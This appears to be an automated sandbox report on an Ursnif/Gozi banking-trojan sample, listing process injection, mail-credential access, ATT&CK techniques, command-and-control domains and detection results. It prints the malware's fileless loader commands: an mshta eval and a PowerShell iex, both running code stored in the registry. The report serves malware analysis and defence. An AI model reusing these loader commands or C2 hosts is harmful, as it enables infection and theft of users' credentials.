        Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute read
        Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
        Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute read
        Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
        Compiles code for process injection (via .Net compiler)Show sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.0.csJump to dropped file
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 88E31580
        Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
        Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
        Source: C:\Windows\explorer.exeThread created: unknown EIP: 88E31580
        Source: C:\Windows\explorer.exeThread created: unknown EIP: 88E31580
        Source: C:\Windows\System32\control.exeThread created: unknown EIP: 88E31580
        Injects code into the Windows Explorer (explorer.exe)Show sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3440 base: 5DA000 value: 00
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3440 base: 7FFD88E31580 value: EB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3440 base: 2980000 value: 80
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3440 base: 7FFD88E31580 value: 40
        Maps a DLL or memory area into another processShow sources
        Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
        Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
        Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
        Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
        Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)Show sources
        Source: C:\Windows\System32\loaddll32.exeThread register set: target process: 6328
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3440
        Source: C:\Windows\explorer.exeThread register set: target process: 3092
        Source: C:\Windows\explorer.exeThread register set: target process: 4252
        Source: C:\Windows\explorer.exeThread register set: target process: 4572
        Source: C:\Windows\explorer.exeThread register set: target process: 5708
        Source: C:\Windows\System32\control.exeThread register set: target process: 3440
        Source: C:\Windows\System32\control.exeThread register set: target process: 6440
        Writes to foreign memory regionsShow sources
        Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7C8C212E0
        Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: B90000
        Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7C8C212E0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 5DA000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFD88E31580
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2980000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFD88E31580
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF8000
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 789A648000
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 21912DC0000
        Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
        Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6EB295FD0
        Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 20675470000
        Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF6EB295FD0
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
        Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
        Source: explorer.exe, 00000020.00000002.723657372.0000000004F80000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000020.00000002.706975872.00000000008B8000.00000004.00000020.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmpBinary or memory string: &Program Manager
        Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F88B98 cpuid
        Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
        Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0139B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F88B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
        Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
        Tries to steal Mail credentials (via file access)Show sources
        Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
        Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Disable or Modify Tools1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Obfuscated Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter12Logon Script (Windows)Process Injection813Software Packing1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSSystem Information Discovery46Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonValid Accounts1Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion3Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection813/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 343316 Sample: out.dll Startdate: 22/01/2021 Architecture: WINDOWS Score: 100 60 resolver1.opendns.com 2->60 84 Multi AV Scanner detection for domain / URL 2->84 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 10 other signatures 2->90 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 2->12         started        14 iexplore.exe 1 56 2->14         started        signatures3 process4 signatures5 92 Suspicious powershell command line found 9->92 16 powershell.exe 2 32 9->16         started        94 Detected Gozi e-Banking trojan 12->94 96 Writes to foreign memory regions 12->96 98 Allocates memory in foreign processes 12->98 100 4 other signatures 12->100 20 control.exe 12->20         started        22 iexplore.exe 30 14->22         started        25 iexplore.exe 30 14->25         started        27 iexplore.exe 30 14->27         started        process6 dnsIp7 52 C:\Users\user\AppData\Local\...\ntdrbunx.0.cs, UTF-8 16->52 dropped 54 C:\Users\user\AppData\...\f1lrerxf.cmdline, UTF-8 16->54 dropped 70 Injects code into the Windows Explorer (explorer.exe) 16->70 72 Writes to foreign memory regions 16->72 74 Modifies the context of a thread in another process (thread injection) 16->74 82 2 other signatures 16->82 29 explorer.exe 16->29 injected 33 csc.exe 3 16->33         started        36 csc.exe 16->36         started        38 conhost.exe 16->38         started        76 Changes memory attributes in foreign processes to executable or writable 20->76 78 Allocates memory in foreign processes 20->78 80 Maps a DLL or memory area into another process 20->80 40 rundll32.exe 20->40         started        62 api10.laptok.at 45.138.24.6, 49744, 49745, 49746 SPECTRAIPSpectraIPBVNL Turkey 22->62 file8 signatures9 process10 dnsIp11 64 c56.lepini.at 29->64 66 app.crasa.at 128.14.142.220, 49758, 80 ZNETUS United States 29->66 68 api3.lepini.at 29->68 102 Tries to steal Mail credentials (via file access) 29->102 104 Changes memory attributes in foreign processes to executable or writable 29->104 106 Writes to foreign memory regions 29->106 108 5 other signatures 29->108 42 RuntimeBroker.exe 29->42 injected 44 RuntimeBroker.exe 29->44 injected 46 cmd.exe 29->46         started        56 C:\Users\user\AppData\Local\...\f1lrerxf.dll, PE32 33->56 dropped 48 cvtres.exe 33->48         started        58 C:\Users\user\AppData\Local\...\ntdrbunx.dll, PE32 36->58 dropped 50 cvtres.exe 36->50         started        file12 signatures13 process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        out.dll37%VirustotalBrowse
        out.dll46%ReversingLabsWin32.Trojan.GenCBL

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        0.2.loaddll32.exe.1040000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
        0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

        Domains

        SourceDetectionScannerLabelLink
        app.crasa.at2%VirustotalBrowse
        c56.lepini.at8%VirustotalBrowse
        api3.lepini.at11%VirustotalBrowse
        api10.laptok.at11%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.mercadolivre.com.br/0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://www.dailymail.co.uk/0%URL Reputationsafe
        http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
        http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://%s.com0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://it.search.dada.net/favicon.ico0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://search.hanafos.com/favicon.ico0%URL Reputationsafe
        http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        http://www.abril.com.br/favicon.ico0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
        http://buscar.ozu.es/0%Avira URL Cloudsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://busca.igbusca.com.br/0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://search.auction.co.kr/0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://google.pchome.com.tw/0%URL Reputationsafe
        http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
        http://www.gmarket.co.kr/0%URL Reputationsafe
        http://www.gmarket.co.kr/0%URL Reputationsafe
        http://www.gmarket.co.kr/0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://searchresults.news.com.au/0%URL Reputationsafe
        http://searchresults.news.com.au/0%URL Reputationsafe
        http://searchresults.news.com.au/0%URL Reputationsafe
        http://ns.adobe.cmg0%Avira URL Cloudsafe
        http://www.asharqalawsat.com/0%URL Reputationsafe
        http://www.asharqalawsat.com/0%URL Reputationsafe
        http://www.asharqalawsat.com/0%URL Reputationsafe
        http://search.yahoo.co.jp0%URL Reputationsafe
